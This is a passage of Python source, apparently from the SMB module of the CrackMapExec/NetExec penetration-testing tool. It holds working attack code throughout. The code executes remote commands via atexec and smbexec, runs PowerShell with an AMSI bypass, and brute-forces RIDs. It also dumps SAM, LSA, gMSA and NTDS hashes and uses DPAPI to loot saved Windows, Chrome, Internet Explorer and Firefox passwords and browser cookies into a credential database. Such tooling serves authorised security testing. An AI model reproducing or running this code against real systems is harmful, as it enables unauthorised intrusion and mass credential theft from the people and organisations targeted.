executing command via mmcexec, traceback:\")\n self.logger.debug(format_exc())\n continue\n elif method == \"atexec\":\n try:\n exec_method = TSCH_EXEC(\n self.host if not self.kerberos else self.hostname + \".\" + self.domain,\n self.smb_share_name,\n self.username,\n self.password,\n self.domain,\n self.kerberos,\n self.aesKey,\n self.kdcHost,\n self.hash,\n self.logger,\n self.args.get_output_tries\n ) # self.args.share)\n self.logger.info(\"Executed command via atexec\")\n break\n except:\n self.logger.debug(\"Error executing command via atexec, traceback:\")\n self.logger.debug(format_exc())\n continue\n elif method == \"smbexec\":\n try:\n exec_method = SMBEXEC(\n self.host if not self.kerberos else self.hostname + \".\" + self.domain,\n self.smb_share_name,\n self.conn,\n self.args.port,\n self.username,\n self.password,\n self.domain,\n self.kerberos,\n self.aesKey,\n self.kdcHost,\n self.hash,\n self.args.share,\n self.args.port,\n self.logger,\n self.args.get_output_tries\n )\n self.logger.info(\"Executed command via smbexec\")\n break\n except:\n self.logger.debug(\"Error executing command via smbexec, traceback:\")\n self.logger.debug(format_exc())\n continue\n\n if hasattr(self, \"server\"):\n self.server.track_host(self.host)\n \n if \"exec_method\" in locals():\n output = exec_method.execute(payload, get_output)\n try:\n if not isinstance(output, str):\n output = output.decode(self.args.codec)\n except UnicodeDecodeError:\n self.logger.debug(\"Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings\")\n output = output.decode(\"cp437\")\n\n output = output.strip()\n self.logger.debug(f\"Output: {output}\")\n\n if (self.args.execute or self.args.ps_execute) and output:\n self.logger.success(f\"Executed command via {current_method}\")\n buf = StringIO(output).readlines()\n for line in buf:\n self.logger.highlight(line.strip())\n return output\n else:\n self.logger.fail(f\"Execute command failed with {current_method}\")\n return False\n \n @requires_admin\n def ps_execute(\n self,\n payload=None,\n get_output=False,\n methods=None,\n force_ps32=False,\n dont_obfs=False,\n ):\n response = []\n if not payload and self.args.ps_execute:\n payload = self.args.ps_execute\n if not self.args.no_output:\n get_output = True\n\n amsi_bypass = self.args.amsi_bypass[0] if self.args.amsi_bypass else None\n if os.path.isfile(payload):\n with open(payload) as commands:\n for c in commands:\n response.append(\n self.execute(\n create_ps_command(\n c,\n force_ps32=force_ps32,\n dont_obfs=dont_obfs,\n custom_amsi=amsi_bypass,\n ),\n get_output,\n methods,\n )\n )\n else:\n response = [\n self.execute(\n create_ps_command(\n payload,\n force_ps32=force_ps32,\n dont_obfs=dont_obfs,\n custom_amsi=amsi_bypass,\n ),\n get_output,\n methods,\n )\n ]\n return response\n\n def shares(self):\n temp_dir = ntpath.normpath(\"\\\\\" + gen_random_string())\n permissions = []\n\n try:\n self.logger.debug(f\"domain: {self.domain}\")\n user_id = self.db.get_user(self.domain.upper(), self.username)[0][0]\n except Exception as e:\n error = get_error_string(e)\n self.logger.fail(f\"Error getting user: {error}\")\n pass\n\n try:\n shares = self.conn.listShares()\n self.logger.info(f\"Shares returned: {shares}\")\n except SessionError as e:\n error = get_error_string(e)\n self.logger.fail(\n f\"Error enumerating shares: {error}\",\n color=\"magenta\" if error in smb_error_status else \"red\",\n )\n return permissions\n except Exception as e:\n error = get_error_string(e)\n self.logger.fail(\n f\"Error enumerating shares: {error}\",\n color=\"magenta\" if error in smb_error_status else \"red\",\n )\n return permissions\n\n for share in shares:\n share_name = share[\"shi1_netname\"][:-1]\n share_remark = share[\"shi1_remark\"][:-1]\n share_info = {\"name\": share_name, \"remark\": share_remark, \"access\": []}\n read = False\n write = False\n try:\n self.conn.listPath(share_name, \"*\")\n read = True\n share_info[\"access\"].append(\"READ\")\n except SessionError as e:\n error = get_error_string(e)\n self.logger.debug(f\"Error checking READ access on share: {error}\")\n pass\n\n if not self.args.no_write_check:\n try:\n self.conn.createDirectory(share_name, temp_dir)\n self.conn.deleteDirectory(share_name, temp_dir)\n write = True\n share_info[\"access\"].append(\"WRITE\")\n except SessionError as e:\n error = get_error_string(e)\n self.logger.debug(f\"Error checking WRITE access on share: {error}\")\n pass\n\n permissions.append(share_info)\n\n if share_name != \"IPC$\":\n try:\n # TODO: check if this already exists in DB before adding\n self.db.add_share(self.hostname, user_id, share_name, share_remark, read, write)\n except Exception as e:\n error = get_error_string(e)\n self.logger.debug(f\"Error adding share: {error}\")\n pass\n\n self.logger.display(\"Enumerated shares\")\n self.logger.highlight(f\"{'Share':<15} {'Permissions':<15} {'Remark'}\")\n self.logger.highlight(f\"{'-----':<15} {'-----------':<15} {'------'}\")\n for share in permissions:\n name = share[\"name\"]\n remark = share[\"remark\"]\n perms = share[\"access\"]\n if self.args.filter_shares and not any(x in perms for x in self.args.filter_shares):\n continue\n self.logger.highlight(f\"{name:<15} {','.join(perms):<15} {remark}\")\n return permissions\n\n def get_dc_ips(self):\n dc_ips = []\n for dc in self.db.get_domain_controllers(domain=self.domain):\n dc_ips.append(dc[1])\n if not dc_ips:\n dc_ips.append(self.host)\n return dc_ips\n\n def sessions(self):\n try:\n sessions = get_netsession(\n self.host,\n self.domain,\n self.username,\n self.password,\n self.lmhash,\n self.nthash,\n )\n self.logger.display(\"Enumerated sessions\")\n for session in sessions:\n if session.sesi10_cname.find(self.local_ip) == -1:\n self.logger.highlight(f\"{session.sesi10_cname:<25} User:{session.sesi10_username}\")\n return sessions\n except:\n pass\n\n def disks(self):\n disks = []\n try:\n disks = get_localdisks(\n self.host,\n self.domain,\n self.username,\n self.password,\n self.lmhash,\n self.nthash,\n )\n self.logger.display(\"Enumerated disks\")\n for disk in disks:\n self.logger.highlight(disk.disk)\n except Exception as e:\n error, desc = e.getErrorString()\n self.logger.fail(\n f\"Error enumerating disks: {error}\",\n color=\"magenta\" if error in smb_error_status else \"red\",\n )\n\n return disks\n\n def local_groups(self):\n groups = []\n # To enumerate local groups the DC IP is optional\n # if specified it will resolve the SIDs and names of any domain accounts in the local group\n for dc_ip in self.get_dc_ips():\n try:\n groups = get_netlocalgroup(\n self.host,\n dc_ip,\n \"\",\n self.username,\n self.password,\n self.lmhash,\n self.nthash,\n queried_groupname=self.args.local_groups,\n list_groups=True if not self.args.local_groups else False,\n recurse=False,\n )\n\n if self.args.local_groups:\n self.logger.success(\"Enumerated members of local group\")\n else:\n self.logger.success(\"Enumerated local groups\")\n\n for group in groups:\n if group.name:\n if not self.args.local_groups:\n self.logger.highlight(f\"{group.name:<40} membercount: {group.membercount}\")\n group_id = self.db.add_group(\n self.hostname,\n group.name,\n member_count_ad=group.membercount,\n )[0]\n else:\n domain, name = group.name.split(\"/\")\n self.logger.highlight(f\"domain: {domain}, name: {name}\")\n self.logger.highlight(f\"{domain.upper()}\\\\{name}\")\n try:\n group_id = self.db.get_groups(\n group_name=self.args.local_groups,\n group_domain=domain,\n )[\n 0\n ][0]\n except IndexError:\n group_id = self.db.add_group(\n domain,\n self.args.local_groups,\n member_count_ad=group.membercount,\n )[0]\n\n # yo dawg, I hear you like groups.\n # So I put a domain group as a member of a local group which is also a member of another local group.\n # (╯°□°)╯︵ ┻━┻\n if not group.isgroup:\n self.db.add_credential(\"plaintext\", domain, name, \"\", group_id, \"\")\n elif group.isgroup:\n self.db.add_group(domain, name, member_count_ad=group.membercount)\n break\n except Exception as e:\n self.logger.fail(f\"Error enumerating local groups of {self.host}: {e}\")\n self.logger.display(\"Trying with SAMRPC protocol\")\n groups = SamrFunc(self).get_local_groups()\n if groups:\n self.logger.success(\"Enumerated local groups\")\n self.logger.debug(f\"Local groups: {groups}\")\n\n for group_name, group_rid in groups.items():\n self.logger.highlight(f\"rid => {group_rid} => {group_name}\")\n group_id = self.db.add_group(self.hostname, group_name, rid=group_rid)[0]\n self.logger.debug(f\"Added group, returned id: {group_id}\")\n return groups\n\n def domainfromdsn(self, dsn):\n dsnparts = dsn.split(\",\")\n domain = \"\"\n for part in dsnparts:\n k, v = part.split(\"=\")\n if k == \"DC\":\n if domain == \"\":\n domain = v\n else:\n domain = domain + \".\" + v\n return domain\n\n def domainfromdnshostname(self, dns):\n dnsparts = dns.split(\".\")\n domain = \".\".join(dnsparts[1:])\n return domain, dnsparts[0] + \"$\"\n\n def groups(self):\n groups = []\n for dc_ip in self.get_dc_ips():\n if self.args.groups:\n try:\n groups = get_netgroupmember(\n dc_ip,\n self.domain,\n self.username,\n password=self.password,\n lmhash=self.lmhash,\n nthash=self.nthash,\n queried_groupname=self.args.groups,\n queried_sid=str(),\n queried_domain=str(),\n ads_path=str(),\n recurse=False,\n use_matching_rule=False,\n full_data=False,\n custom_filter=str(),\n )\n\n self.logger.success(\"Enumerated members of domain group\")\n for group in groups:\n member_count = len(group.member) if hasattr(group, \"member\") else 0\n self.logger.highlight(f\"{group.memberdomain}\\\\{group.membername}\")\n try:\n group_id = self.db.get_groups(\n group_name=self.args.groups,\n group_domain=group.groupdomain,\n )[\n 0\n ][0]\n except IndexError:\n group_id = self.db.add_group(\n group.groupdomain,\n self.args.groups,\n member_count_ad=member_count,\n )[0]\n if not group.isgroup:\n self.db.add_credential(\n \"plaintext\",\n group.memberdomain,\n group.membername,\n \"\",\n group_id,\n \"\",\n )\n elif group.isgroup:\n group_id = self.db.add_group(\n group.groupdomain,\n group.groupname,\n member_count_ad=member_count,\n )[0]\n break\n except Exception as e:\n self.logger.fail(f\"Error enumerating domain group members using dc ip {dc_ip}: {e}\")\n else:\n try:\n groups = get_netgroup(\n dc_ip,\n self.domain,\n self.username,\n password=self.password,\n lmhash=self.lmhash,\n nthash=self.nthash,\n queried_groupname=str(),\n queried_sid=str(),\n queried_username=str(),\n queried_domain=str(),\n ads_path=str(),\n admin_count=False,\n full_data=True,\n custom_filter=str(),\n )\n\n self.logger.success(\"Enumerated domain group(s)\")\n for group in groups:\n member_count = len(group.member) if hasattr(group, \"member\") else 0\n self.logger.highlight(f\"{group.samaccountname:<40} membercount: {member_count}\")\n\n if bool(group.isgroup) is True:\n # Since there isn't a groupmember attribute on the returned object from get_netgroup\n # we grab it from the distinguished name\n domain = self.domainfromdsn(group.distinguishedname)\n group_id = self.db.add_group(\n domain,\n group.samaccountname,\n member_count_ad=member_count,\n )[0]\n break\n except Exception as e:\n self.logger.fail(f\"Error enumerating domain group using dc ip {dc_ip}: {e}\")\n return groups\n\n def users(self):\n self.logger.display(\"Trying to dump local users with SAMRPC protocol\")\n users = UserSamrDump(self).dump()\n return users\n\n def hosts(self):\n hosts = []\n for dc_ip in self.get_dc_ips():\n try:\n hosts = get_netcomputer(\n dc_ip,\n self.domain,\n self.username,\n password=self.password,\n lmhash=self.lmhash,\n nthash=self.nthash,\n queried_domain=\"\",\n ads_path=str(),\n custom_filter=str(),\n )\n\n self.logger.success(\"Enumerated domain computer(s)\")\n for hosts in hosts:\n domain, host_clean = self.domainfromdnshostname(hosts.dnshostname)\n self.logger.highlight(f\"{domain}\\\\{host_clean:<30}\")\n break\n except Exception as e:\n self.logger.fail(f\"Error enumerating domain hosts using dc ip {dc_ip}: {e}\")\n break\n return hosts\n\n def loggedon_users(self):\n logged_on = []\n try:\n logged_on = get_netloggedon(\n self.host,\n self.domain,\n self.username,\n self.password,\n lmhash=self.lmhash,\n nthash=self.nthash,\n )\n self.logger.success(\"Enumerated logged_on users\")\n if self.args.loggedon_users_filter:\n for user in logged_on:\n if re.match(self.args.loggedon_users_filter, user.wkui1_username):\n self.logger.highlight(f\"{user.wkui1_logon_domain}\\\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}\")\n else:\n for user in logged_on:\n self.logger.highlight(f\"{user.wkui1_logon_domain}\\\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}\")\n except Exception as e:\n self.logger.fail(f\"Error enumerating logged on users: {e}\")\n return logged_on\n\n def pass_pol(self):\n return PassPolDump(self).dump()\n\n @requires_admin\n def wmi(self, wmi_query=None, namespace=None):\n records = []\n if not wmi_query:\n wmi_query = self.args.wmi.strip('\\n')\n\n if not namespace:\n namespace = self.args.wmi_namespace\n\n try:\n dcom = DCOMConnection(\n self.host if not self.kerberos else self.hostname + \".\" + self.domain,\n self.username,\n self.password,\n self.domain,\n self.lmhash,\n self.nthash,\n oxidResolver=True,\n doKerberos=self.kerberos,\n kdcHost=self.kdcHost,\n aesKey=self.aesKey\n )\n iInterface = dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login,IID_IWbemLevel1Login)\n flag, stringBinding = dcom_FirewallChecker(iInterface, self.args.dcom_timeout)\n if not flag or not stringBinding:\n error_msg = f'WMI Query: Dcom initialization failed on connection with stringbinding: \"{stringBinding}\", please increase the timeout with the option \"--dcom-timeout\". If it\\'s still failing maybe something is blocking the RPC connection, try another exec method'\n \n if not stringBinding:\n error_msg = \"WMI Query: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again\"\n \n self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)\n # Make it force break function\n dcom.disconnect()\n iWbemLevel1Login = IWbemLevel1Login(iInterface)\n iWbemServices= iWbemLevel1Login.NTLMLogin(namespace , NULL, NULL)\n iWbemLevel1Login.RemRelease()\n iEnumWbemClassObject = iWbemServices.ExecQuery(wmi_query)\n except Exception as e:\n self.logger.fail('Execute WQL error: {}'.format(e))\n if \"iWbemLevel1Login\" in locals():\n dcom.disconnect()\n else:\n self.logger.info(f\"Executing WQL syntax: {wmi_query}\")\n while True:\n try:\n wmi_results = iEnumWbemClassObject.Next(0xffffffff, 1)[0]\n record = wmi_results.getProperties()\n records.append(record)\n for k,v in record.items():\n self.logger.highlight(f\"{k} => {v['value']}\")\n except Exception as e:\n if str(e).find('S_FALSE') < 0:\n raise e\n else:\n break\n dcom.disconnect()\n return records if records else False\n\n def spider(\n self,\n share=None,\n folder=\".\",\n pattern=[],\n regex=[],\n exclude_dirs=[],\n depth=None,\n content=False,\n only_files=True,\n ):\n spider = SMBSpider(self.conn, self.logger)\n\n self.logger.display(\"Started spidering\")\n start_time = time()\n if not share:\n spider.spider(\n self.args.spider,\n self.args.spider_folder,\n self.args.pattern,\n self.args.regex,\n self.args.exclude_dirs,\n self.args.depth,\n self.args.content,\n self.args.only_files,\n )\n else:\n spider.spider(share, folder, pattern, regex, exclude_dirs, depth, content, only_files)\n\n self.logger.display(f\"Done spidering (Completed in {time() - start_time})\")\n\n return spider.results\n\n def rid_brute(self, max_rid=None):\n entries = []\n if not max_rid:\n max_rid = int(self.args.rid_brute)\n\n KNOWN_PROTOCOLS = {\n 135: {\"bindstr\": r\"ncacn_ip_tcp:%s\", \"set_host\": False},\n 139: {\"bindstr\": r\"ncacn_np:{}[\\pipe\\lsarpc]\", \"set_host\": True},\n 445: {\"bindstr\": r\"ncacn_np:{}[\\pipe\\lsarpc]\", \"set_host\": True},\n }\n\n try:\n full_hostname = self.host if not self.kerberos else self.hostname + \".\" + self.domain\n string_binding = KNOWN_PROTOCOLS[self.args.port][\"bindstr\"]\n logging.debug(f\"StringBinding {string_binding}\")\n rpc_transport = transport.DCERPCTransportFactory(string_binding)\n rpc_transport.set_dport(self.args.port)\n\n if KNOWN_PROTOCOLS[self.args.port][\"set_host\"]:\n rpc_transport.setRemoteHost(full_hostname)\n\n if hasattr(rpc_transport, \"set_credentials\"):\n # This method exists only for selected protocol sequences.\n rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey)\n\n if self.kerberos:\n rpc_transport.set_kerberos(self.kerberos, self.kdcHost)\n\n dce = rpc_transport.get_dce_rpc()\n if self.kerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n\n dce.connect()\n except Exception as e:\n self.logger.fail(f\"Error creating DCERPC connection: {e}\")\n return entries\n\n # Want encryption? Uncomment next line\n # But make simultaneous variable <= 100\n # dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)\n\n # Want fragmentation? Uncomment next line\n # dce.set_max_fragment_size(32)\n\n dce.bind(lsat.MSRPC_UUID_LSAT)\n try:\n resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)\n except lsad.DCERPCSessionError as e:\n self.logger.fail(f\"Error connecting: {e}\")\n return entries\n\n policy_handle = resp[\"PolicyHandle\"]\n\n resp = lsad.hLsarQueryInformationPolicy2(\n dce,\n policy_handle,\n lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation,\n )\n domain_sid = resp[\"PolicyInformation\"][\"PolicyAccountDomainInfo\"][\"DomainSid\"].formatCanonical()\n\n so_far = 0\n simultaneous = 1000\n for j in range(max_rid // simultaneous + 1):\n if (max_rid - so_far) // simultaneous == 0:\n sids_to_check = (max_rid - so_far) % simultaneous\n else:\n sids_to_check = simultaneous\n\n if sids_to_check == 0:\n break\n\n sids = list()\n for i in range(so_far, so_far + sids_to_check):\n sids.append(f\"{domain_sid}-{i:d}\")\n try:\n lsat.hLsarLookupSids(dce, policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)\n except DCERPCException as e:\n if str(e).find(\"STATUS_NONE_MAPPED\") >= 0:\n so_far += simultaneous\n continue\n elif str(e).find(\"STATUS_SOME_NOT_MAPPED\") >= 0:\n resp = e.get_packet()\n else:\n raise\n\n for n, item in enumerate(resp[\"TranslatedNames\"][\"Names\"]):\n if item[\"Use\"] != SID_NAME_USE.SidTypeUnknown:\n rid = so_far + n\n domain = resp[\"ReferencedDomains\"][\"Domains\"][item[\"DomainIndex\"]][\"Name\"]\n user = item[\"Name\"]\n sid_type = SID_NAME_USE.enumItems(item[\"Use\"]).name\n self.logger.highlight(f\"{rid}: {domain}\\\\{user} ({sid_type})\")\n entries.append(\n {\n \"rid\": rid,\n \"domain\": domain,\n \"username\": user,\n \"sidtype\": sid_type,\n }\n )\n so_far += simultaneous\n dce.disconnect()\n return entries\n\n def put_file(self):\n self.logger.display(f\"Copying {self.args.put_file[0]} to {self.args.put_file[1]}\")\n with open(self.args.put_file[0], \"rb\") as file:\n try:\n self.conn.putFile(self.args.share, self.args.put_file[1], file.read)\n self.logger.success(f\"Created file {self.args.put_file[0]} on \\\\\\\\{self.args.share}\\\\{self.args.put_file[1]}\")\n except Exception as e:\n self.logger.fail(f\"Error writing file to share {self.args.share}: {e}\")\n\n def get_file(self):\n share_name = self.args.share\n remote_path = self.args.get_file[0]\n download_path = self.args.get_file[1]\n self.logger.display(f'Copying \"{remote_path}\" to \"{download_path}\"')\n if self.args.append_host:\n download_path = f\"{self.hostname}-{remote_path}\"\n with open(download_path, \"wb+\") as file:\n try:\n self.conn.getFile(share_name, remote_path, file.write)\n self.logger.success(f'File \"{remote_path}\" was downloaded to \"{download_path}\"')\n except Exception as e:\n self.logger.fail(f'Error writing file \"{remote_path}\" from share \"{share_name}\": {e}')\n if os.path.getsize(download_path) == 0:\n os.remove(download_path)\n\n def enable_remoteops(self):\n if self.remote_ops is not None and self.bootkey is not None:\n return\n try:\n self.remote_ops = RemoteOperations(self.conn, self.kerberos, self.kdcHost)\n self.remote_ops.enableRegistry()\n self.bootkey = self.remote_ops.getBootKey()\n except Exception as e:\n self.logger.fail(f\"RemoteOperations failed: {e}\")\n\n @requires_admin\n def sam(self):\n try:\n self.enable_remoteops()\n host_id = self.db.get_hosts(filter_term=self.host)[0][0]\n\n def add_sam_hash(sam_hash, host_id):\n add_sam_hash.sam_hashes += 1\n self.logger.highlight(sam_hash)\n username, _, lmhash, nthash, _, _, _ = sam_hash.split(\":\")\n self.db.add_credential(\n \"hash\",\n self.hostname,\n username,\n \":\".join((lmhash, nthash)),\n pillaged_from=host_id,\n )\n\n add_sam_hash.sam_hashes = 0\n\n if self.remote_ops and self.bootkey:\n SAM_file_name = self.remote_ops.saveSAM()\n SAM = SAMHashes(\n SAM_file_name,\n self.bootkey,\n isRemote=True,\n perSecretCallback=lambda secret: add_sam_hash(secret, host_id),\n )\n\n self.logger.display(\"Dumping SAM hashes\")\n SAM.dump()\n SAM.export(self.output_filename)\n self.logger.success(f\"Added {highlight(add_sam_hash.sam_hashes)} SAM hashes to the database\")\n\n try:\n self.remote_ops.finish()\n except Exception as e:\n self.logger.debug(f\"Error calling remote_ops.finish(): {e}\")\n SAM.finish()\n except SessionError as e:\n if \"STATUS_ACCESS_DENIED\" in e.getErrorString():\n self.logger.fail(\"Error \\\"STATUS_ACCESS_DENIED\\\" while dumping SAM. This is likely due to an endpoint protection.\")\n except Exception as e:\n self.logger.exception(str(e))\n\n @requires_admin\n def dpapi(self):\n dump_system = False if \"nosystem\" in self.args.dpapi else True\n logging.getLogger(\"dploot\").disabled = True\n\n if self.args.pvk is not None:\n try:\n self.pvkbytes = open(self.args.pvk, \"rb\").read()\n self.logger.success(f\"Loading domain backupkey from {self.args.pvk}\")\n except Exception as e:\n self.logger.fail(str(e))\n\n masterkeys = []\n if self.args.mkfile is not None:\n try:\n masterkeys += parse_masterkey_file(self.args.mkfile)\n except Exception as e:\n self.logger.fail(str(e))\n\n if self.pvkbytes is None and self.no_da is None and self.args.local_auth is False:\n try:\n results = self.db.get_domain_backupkey(self.domain)\n except:\n self.logger.fail(\n \"Your version of CMEDB is not up to date, run cmedb and create a new workspace: \\\n 'workspace create dpapi' then re-run the dpapi option\"\n )\n return False\n if len(results) > 0:\n self.logger.success(\"Loading domain backupkey from cmedb...\")\n self.pvkbytes = results[0][2]\n else:\n try:\n dc_target = Target.create(\n domain=self.domain,\n username=self.username,\n password=self.password,\n target=self.domain, # querying DNS server for domain will return DC\n lmhash=self.lmhash,\n nthash=self.nthash,\n do_kerberos=self.kerberos,\n aesKey=self.aesKey,\n no_pass=True,\n use_kcache=self.use_kcache,\n )\n dc_conn = DPLootSMBConnection(dc_target)\n dc_conn.connect() # Connect to DC\n if dc_conn.is_admin():\n self.logger.success(\"User is Domain Administrator, exporting domain backupkey...\")\n backupkey_triage = BackupkeyTriage(target=dc_target, conn=dc_conn)\n backupkey = backupkey_triage.triage_backupkey()\n self.pvkbytes = backupkey.backupkey_v2\n self.db.add_domain_backupkey(self.domain, self.pvkbytes)\n else:\n self.no_da = False\n except Exception as e:\n self.logger.fail(f\"Could not get domain backupkey: {e}\")\n pass\n\n target = Target.create(\n domain=self.domain,\n username=self.username,\n password=self.password,\n target=self.hostname + \".\" + self.domain if self.kerberos else self.host,\n lmhash=self.lmhash,\n nthash=self.nthash,\n do_kerberos=self.kerberos,\n aesKey=self.aesKey,\n no_pass=True,\n use_kcache=self.use_kcache,\n )\n\n try:\n conn = DPLootSMBConnection(target)\n conn.smb_session = self.conn\n except Exception as e:\n self.logger.debug(f\"Could not upgrade connection: {e}\")\n return\n\n plaintexts = {username: password for _, _, username, password, _, _ in self.db.get_credentials(cred_type=\"plaintext\")}\n nthashes = {username: nt.split(\":\")[1] if \":\" in nt else nt for _, _, username, nt, _, _ in self.db.get_credentials(cred_type=\"hash\")}\n if self.password != \"\":\n plaintexts[self.username] = self.password\n if self.nthash != \"\":\n nthashes[self.username] = self.nthash\n\n # Collect User and Machine masterkeys\n try:\n self.logger.display(\"Collecting User and Machine masterkeys, grab a coffee and be patient...\")\n masterkeys_triage = MasterkeysTriage(\n target=target,\n conn=conn,\n pvkbytes=self.pvkbytes,\n passwords=plaintexts,\n nthashes=nthashes,\n )\n self.logger.debug(f\"Masterkeys Triage: {masterkeys_triage}\")\n masterkeys += masterkeys_triage.triage_masterkeys()\n if dump_system:\n masterkeys += masterkeys_triage.triage_system_masterkeys()\n except Exception as e:\n self.logger.debug(f\"Could not get masterkeys: {e}\")\n\n if len(masterkeys) == 0:\n self.logger.fail(\"No masterkeys looted\")\n return\n\n self.logger.success(f\"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...\")\n\n credentials = []\n system_credentials = []\n try:\n # Collect User and Machine Credentials Manager secrets\n credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys)\n self.logger.debug(f\"Credentials Triage Object: {credentials_triage}\")\n credentials = credentials_triage.triage_credentials()\n self.logger.debug(f\"Triaged Credentials: {credentials}\")\n if dump_system:\n system_credentials = credentials_triage.triage_system_credentials()\n self.logger.debug(f\"Triaged System Credentials: {system_credentials}\")\n except Exception as e:\n self.logger.debug(f\"Error while looting credentials: {e}\")\n\n for credential in credentials:\n self.logger.highlight(f\"[{credential.winuser}][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}\")\n self.db.add_dpapi_secrets(\n target.address,\n \"CREDENTIAL\",\n credential.winuser,\n credential.username,\n credential.password,\n credential.target,\n )\n for credential in system_credentials:\n self.logger.highlight(f\"[SYSTEM][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}\")\n self.db.add_dpapi_secrets(\n target.address,\n \"CREDENTIAL\",\n \"SYSTEM\",\n credential.username,\n credential.password,\n credential.target,\n )\n\n browser_credentials = []\n cookies = []\n try:\n # Collect Chrome Based Browser stored secrets\n dump_cookies = True if \"cookies\" in self.args.dpapi else False\n browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys)\n browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies)\n except Exception as e:\n self.logger.debug(f\"Error while looting browsers: {e}\")\n for credential in browser_credentials:\n cred_url = credential.url + \" -\" if credential.url != \"\" else \"-\"\n self.logger.highlight(f\"[{credential.winuser}][{credential.browser.upper()}] {cred_url} {credential.username}:{credential.password}\")\n self.db.add_dpapi_secrets(\n target.address,\n credential.browser.upper(),\n credential.winuser,\n credential.username,\n credential.password,\n credential.url,\n )\n\n if dump_cookies:\n self.logger.display(\"Start Dumping Cookies\")\n for cookie in cookies:\n if cookie.cookie_value != '':\n self.logger.highlight(f\"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}\")\n self.logger.display(\"End Dumping Cookies\")\n\n vaults = []\n try:\n # Collect User Internet Explorer stored secrets\n vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys)\n vaults = vaults_triage.triage_vaults()\n except Exception as e:\n self.logger.debug(f\"Error while looting vaults: {e}\")\n for vault in vaults:\n if vault.type == \"Internet Explorer\":\n resource = vault.resource + \" -\" if vault.resource != \"\" else \"-\"\n self.logger.highlight(f\"[{vault.winuser}][IEX] {resource} - {vault.username}:{vault.password}\")\n self.db.add_dpapi_secrets(\n target.address,\n \"IEX\",\n vault.winuser,\n vault.username,\n vault.password,\n vault.resource,\n )\n\n firefox_credentials = []\n try:\n # Collect Firefox stored secrets\n firefox_triage = FirefoxTriage(target=target, logger=self.logger, conn=conn)\n firefox_credentials = firefox_triage.run()\n except Exception as e:\n self.logger.debug(f\"Error while looting firefox: {e}\")\n for credential in firefox_credentials:\n url = credential.url + \" -\" if credential.url != \"\" else \"-\"\n self.logger.highlight(f\"[{credential.winuser}][FIREFOX] {url} {credential.username}:{credential.password}\")\n self.db.add_dpapi_secrets(\n target.address,\n \"FIREFOX\",\n credential.winuser,\n credential.username,\n credential.password,\n credential.url,\n )\n\n @requires_admin\n def lsa(self):\n try:\n self.enable_remoteops()\n\n def add_lsa_secret(secret):\n add_lsa_secret.secrets += 1\n self.logger.highlight(secret)\n if \"_SC_GMSA_{84A78B8C\" in secret:\n gmsa_id = secret.split(\"_\")[4].split(\":\")[0]\n data = bytes.fromhex(secret.split(\"_\")[4].split(\":\")[1])\n blob = MSDS_MANAGEDPASSWORD_BLOB()\n blob.fromString(data)\n currentPassword = blob[\"CurrentPassword\"][:-2]\n ntlm_hash = MD4.new()\n ntlm_hash.update(currentPassword)\n passwd = binascii.hexlify(ntlm_hash.digest()).decode(\"utf-8\")\n self.logger.highlight(f\"GMSA ID: {gmsa_id:<20} NTLM: {passwd}\")\n\n add_lsa_secret.secrets = 0\n\n if self.remote_ops and self.bootkey:\n SECURITYFileName = self.remote_ops.saveSECURITY()\n LSA = LSASecrets(\n SECURITYFileName,\n self.bootkey,\n self.remote_ops,\n isRemote=True,\n perSecretCallback=lambda secret_type, secret: add_lsa_secret(secret),\n )\n self.logger.success(\"Dumping LSA secrets\")\n LSA.dumpCachedHashes()\n LSA.exportCached(self.output_filename)\n LSA.dumpSecrets()\n LSA.exportSecrets(self.output_filename)\n self.logger.success(f\"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {self.output_filename + '.secrets'} and {self.output_filename + '.cached'}\")\n try:\n self.remote_ops.finish()\n except Exception as e:\n self.logger.debug(f\"Error calling remote_ops.finish(): {e}\")\n LSA.finish()\n except SessionError as e:\n if \"STATUS_ACCESS_DENIED\" in e.getErrorString():\n self.logger.fail(\"Error \\\"STATUS_ACCESS_DENIED\\\" while dumping LSA. This is likely due to an endpoint protection.\")\n except Exception as e:\n self.logger.exception(str(e))\n\n def ntds(self):\n self.enable_remoteops()\n use_vss_method = False\n NTDSFileName = None\n host_id = self.db.get_hosts(filter_term=self.host)[0][0]\n\n def add_ntds_hash(ntds_hash, host_id):\n add_ntds_hash.ntds_hashes += 1\n if self.args.enabled:\n if \"Enabled\" in ntds_hash:\n ntds_hash = ntds_hash.split(\" \")[0]\n self.logger.highlight(ntds_hash)\n else:\n ntds_hash = ntds_hash.split(\" \")[0]\n self.logger.highlight(ntds_hash)\n if ntds_hash.find(\"$\") == -1:\n if ntds_hash.find(\"\\\\\") != -1:\n domain, hash = ntds_hash.split(\"\\\\\")\n else:\n domain = self.domain\n hash = ntds_hash\n\n try:\n username, _, lmhash, nthash, _, _, _ = hash.split(\":\")\n parsed_hash = \":\".join((lmhash, nthash))\n if validate_ntlm(parsed_hash):\n self.db.add_credential(\"hash\", domain, username, parsed_hash, pillaged_from=host_id)\n add_ntds_hash.added_to_db += 1\n return\n raise\n except:\n self.logger.debug(\"Dumped hash is not NTLM, not adding to db for now ;)\")\n else:\n self.logger.debug(\"Dumped hash is a computer account, not adding to db\")\n\n 